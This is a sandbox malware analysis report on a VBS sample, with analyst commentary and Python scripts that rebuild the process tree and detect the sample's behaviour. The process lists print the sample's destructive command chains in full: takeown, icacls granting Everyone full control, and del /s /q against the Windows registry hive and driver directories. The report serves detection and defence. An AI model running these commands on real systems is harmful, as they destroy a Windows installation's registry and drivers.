Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-1dy1xszfmm
Target file.vbs
SHA256 e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c

Threat Level: Likely malicious

The file file.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

A note on reading the signatures above. The first cmd.exe in each detonation is the sandbox's launcher: it copies the submitted file to thescript.vbs (same SHA256 as the sample) and starts it, so the script's own behaviour begins at WScript.exe. WScript.exe then spawns two cmd.exe chains that run takeown /f, icacls /grant everyone:(f) and del /s /q against c:\windows\system32\config\* (the registry hives: SAM, SECURITY, SOFTWARE, SYSTEM, DEFAULT) and c:\windows\system32\drivers\*. Those commands already need an administrative token on these paths (takeown enables SeTakeOwnershipPrivilege, which is what the AdjustPrivilegeToken signature records), so "Possible privilege escalation attempt" is the sandbox's heuristic label for ownership and ACL tampering (ATT&CK T1222.001) followed by data destruction (T1485); nothing in the report shows a lower-privilege context being escalated. Loaded hives and in-use driver files will resist the del, but the ACL change alone leaves Everyone with Full control over whatever remains, so a host that ran this needs its ACLs reset and its integrity checked rather than just the script removed. The "likely ransom note" signature fires on Notepad opening C:\Users\Admin\Desktop\UnpublishReceive.vbs, a .vbs on the sandbox desktop that does not appear among the files written during the run, not a note written by the sample. The WriteProcessMemory rows pair each parent with the child it spawned (cmd.exe into WScript.exe, WScript.exe into cmd.exe, cmd.exe into takeown.exe and icacls.exe), which is what process creation looks like in this sandbox's event view, not injection into an unrelated process.

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:32

Reported

2024-08-15 21:35

Platform

win7-20240704-en

Max time kernel

119s

Max time network

120s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\Notepad.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2764 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2764 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2764 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2788 wrote to memory of 2628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2680 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2680 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2680 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2628 wrote to memory of 2796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2628 wrote to memory of 2796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2628 wrote to memory of 2796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2680 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2680 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2680 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2628 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2628 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2628 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2680 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2680 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2680 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
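The rows above are the only process-lineage data in the report, and they repeat each edge three times, so they are hard to read as a tree by eye. The following is an added example (my code, not part of the sandbox report) that parses those rows into a parent/child tree, collapses the repeated edges, renders the tree, and returns the ancestry chain of any PID, the chain a detection rule would key on. The rows are copied from the table above; the regex and the decision to keep one edge per parent/child pair are my assumptions.

```python
"""Rebuild the process tree from the sandbox's WriteProcessMemory rows."""
import re
from collections import defaultdict

# Rows copied verbatim from the behavioral1 WriteProcessMemory table.
WPM_ROWS = r"""
PID 2764 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2764 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2764 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2788 wrote to memory of 2628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2680 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2680 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2680 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2628 wrote to memory of 2796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2628 wrote to memory of 2796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2628 wrote to memory of 2796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2680 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2680 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2680 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2628 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2628 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2628 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2680 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2680 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2680 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
""".strip().splitlines()

# Row shape (my assumption from the table): writer PID, target PID, indicator, writer image, target image.
ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_rows(rows):
    """Return (children, image): children[ppid] is the ordered list of distinct
    child PIDs, image[pid] the image path the sandbox recorded for that PID."""
    children, image = defaultdict(list), {}
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            continue                      # header line or a row in another shape
        ppid, pid, _indicator, src, dst = m.groups()
        ppid, pid = int(ppid), int(pid)
        image.setdefault(ppid, src)
        image.setdefault(pid, dst)
        if pid not in children[ppid]:     # the table repeats each edge three times
            children[ppid].append(pid)
    return children, image


def basename(path):
    return path.rsplit("\\", 1)[-1]


def roots(children):
    """PIDs that write to others but are never written to: the top of the tree."""
    spawned = {c for kids in children.values() for c in kids}
    return [p for p in children if p not in spawned]


def render(children, image, pid, depth=0, out=None):
    """Indented text tree, one 'PID image' line per process."""
    out = [] if out is None else out
    out.append("  " * depth + f"{pid} {basename(image[pid])}")
    for child in children.get(pid, []):
        render(children, image, child, depth + 1, out)
    return out


def ancestry(children, image, pid):
    """Image names from the root down to pid, e.g. cmd.exe -> WScript.exe -> cmd.exe -> takeown.exe."""
    parent = {c: p for p, kids in children.items() for c in kids}
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return [basename(image[p]) for p in reversed(chain)]


if __name__ == "__main__":
    ch, im = parse_rows(WPM_ROWS)
    for root in roots(ch):
        print("\n".join(render(ch, im, root)))
    print(" -> ".join(ancestry(ch, im, 2796)))
```

The ancestry chain is the useful output: a rule that alerts on takeown.exe or icacls.exe whose grandparent is WScript.exe (or cscript.exe, mshta.exe, wmic.exe) catches this family of script launchers without alerting on an administrator running the same tools from an interactive shell.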

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\UnpublishReceive.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\SetPush.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\UnpublishReceive.vbs"

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T
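The two cmd.exe chains above are the entire payload, and each tool in them (takeown, icacls, del) is routine administrative tooling on its own, so a detection is best written against the whole command line. The following is an added example (my code, not part of the sandbox report) that splits a cmd /c line into its && sub-commands, strips redirections such as >nul and 2>&1, and flags ownership or ACL tampering (ATT&CK T1222.001) followed by deletion (T1485) against the two directories this sample targets. The LAUNCHER, CONFIG_CHAIN and DRIVERS_CHAIN lines are copied from the process list above; the protected-path list, the step names, the severity ladder and the BENIGN control line are my assumptions.

```python
"""Flag the takeown -> icacls /grant Everyone:(F) -> del chain against protected
Windows directories, as seen in the cmd.exe command lines in this report."""
import re
from dataclasses import dataclass, field

# Directories where ownership/ACL changes followed by deletion are not legitimate admin work (my list).
PROTECTED_PREFIXES = (r"c:\windows\system32\config", r"c:\windows\system32\drivers")

TOKEN_RE = re.compile(r'"[^"]*"|\S+')                          # keep quoted paths as one token
GRANT_EVERYONE_FULL_RE = re.compile(r"/grant(?::r)?\s+everyone:\S*f", re.I)  # F = Full control
DELETE_CMDS = {"del", "erase", "rd", "rmdir"}
TECHNIQUE = {"takeown": "T1222.001", "grant-everyone-full": "T1222.001", "delete": "T1485"}

# Command lines copied from the process list above.
LAUNCHER = r'cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"'
CONFIG_CHAIN = (r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul '
                r'&& icacls c:\windows\system32\config\* /grant everyone:(f) >nul '
                r'&& del /s /q c:\windows\system32\config\* >nul 2>&1')
DRIVERS_CHAIN = CONFIG_CHAIN.replace(r"\config\*", r"\drivers\*")
# Constructed control: an admin repairing ACLs on the same directory must not fire.
BENIGN = r'"C:\Windows\System32\cmd.exe" /c icacls c:\windows\system32\drivers\* /reset /t'


@dataclass
class Finding:
    path: str                                    # protected prefix that was hit
    steps: list = field(default_factory=list)    # ordered suspicious steps seen against it
    techniques: list = field(default_factory=list)


def split_chain(cmdline):
    """Tokenise 'cmd /c a && b && c' into one token list per sub-command: drops the
    cmd.exe image and /c, unwraps the quoted form cmd /c "a && b", drops redirections."""
    tokens = TOKEN_RE.findall(cmdline)
    if tokens and tokens[0].strip('"').lower().rsplit("\\", 1)[-1] in ("cmd", "cmd.exe"):
        tokens = tokens[1:]
    if tokens and tokens[0].lower() in ("/c", "/k"):
        tokens = tokens[1:]
    if len(tokens) == 1 and tokens[0].startswith('"') and tokens[0].endswith('"'):
        tokens = TOKEN_RE.findall(tokens[0][1:-1])
    commands, current = [], []
    for tok in tokens:
        if tok in ("&&", "||", "&"):
            if current:
                commands.append(current)
            current = []
        elif re.match(r"[12]?>", tok):           # >nul, 2>&1, 1>log.txt
            continue
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def protected(tok):
    t = tok.strip('"').lower()
    return next((p for p in PROTECTED_PREFIXES if t.startswith(p)), None)


def evaluate(cmdline):
    """Return one Finding per protected prefix touched by a suspicious step."""
    hits = {}
    for cmd in split_chain(cmdline):
        name = cmd[0].strip('"').lower().rsplit("\\", 1)[-1].removesuffix(".exe")
        args = " ".join(cmd[1:])
        for tok in cmd[1:]:
            prefix = protected(tok)
            if prefix is None:
                continue
            step = None
            if name == "takeown":
                step = "takeown"
            elif name == "icacls" and GRANT_EVERYONE_FULL_RE.search(args):
                step = "grant-everyone-full"
            elif name in DELETE_CMDS:
                step = "delete"
            if step:
                hits.setdefault(prefix, Finding(prefix)).steps.append(step)
    for f in hits.values():
        f.techniques = sorted({TECHNIQUE[s] for s in f.steps})
    return list(hits.values())


def severity(findings):
    """'critical' when tampering and destruction hit the same protected path,
    'high' for either alone, 'none' when nothing matched."""
    worst = "none"
    for f in findings:
        if {"T1222.001", "T1485"} <= set(f.techniques):
            return "critical"
        worst = "high"
    return worst


if __name__ == "__main__":
    for line in (LAUNCHER, CONFIG_CHAIN, DRIVERS_CHAIN, BENIGN):
        found = evaluate(line)
        print(severity(found), [(f.path, f.steps) for f in found])
```

In production the input is the CommandLine field of Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing enabled). Matching on "/grant everyone:(f)" alone would also catch an administrator sharing a folder; keying on the protected directory and on the del that follows in the same chain is what makes the rule specific to this behaviour.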

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 a5248e8a553244ebf5fe783d59068860
SHA1 f866fc5f1d41e8cf209b3ea253f49a9caebb0012
SHA256 e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
SHA512 7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8

C:\Users\Admin\Desktop\GetMove.vbs

MD5 ece02545122cc48c9d8afaf3f94dd04f
SHA1 8e07b6da685faad07f8413230a95ce0ae8987e0d
SHA256 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512 e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:32

Reported

2024-08-15 21:35

Platform

win10v2004-20240802-en

Max time kernel

144s

Max time network

135s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4088,i,11708048364682646792,608099842549576907,262144 --variations-seed-version --mojo-platform-channel-handle=1020 /prefetch:8

Network

All entries below are reverse-DNS (PTR) lookups of public addresses, a lookup for edge.msiserver.lan, and HTTPS connections to tse1.mm.bing.net consistent with the Microsoft Edge utility process in the process list above. The report attributes none of them to the script's processes, and the Windows 7 detonation recorded no network activity at all, so treat them as background traffic of the Windows 10 image rather than as indicators for this sample.

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 edge.msiserver.lan udp
US 8.8.8.8:53 edge.msiserver.lan udp
US 8.8.8.8:53 edge.msiserver.lan udp
US 8.8.8.8:53 edge.msiserver.lan udp
US 8.8.8.8:53 edge.msiserver.lan udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 23.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 a5248e8a553244ebf5fe783d59068860
SHA1 f866fc5f1d41e8cf209b3ea253f49a9caebb0012
SHA256 e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
SHA512 7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8

C:\Users\Admin\Desktop\ConvertToSelect.vbs

MD5 ece02545122cc48c9d8afaf3f94dd04f
SHA1 8e07b6da685faad07f8413230a95ce0ae8987e0d
SHA256 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512 e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5

This second file is not the submitted sample; it carries exactly the same MD5, SHA1, SHA256 and SHA512 as C:\Users\Admin\Desktop\GetMove.vbs in the Windows 7 detonation, under a different name. Identical content appearing under a different name in two independent runs points to a desktop file supplied by the sandbox image (the names follow the same pattern as the SetPush.vbs and UnpublishReceive.vbs files that WScript.exe and Notepad.exe are seen opening) rather than to an artifact dropped by the script, so these names and hashes should not be used as indicators of compromise without confirming the write in a file-system trace.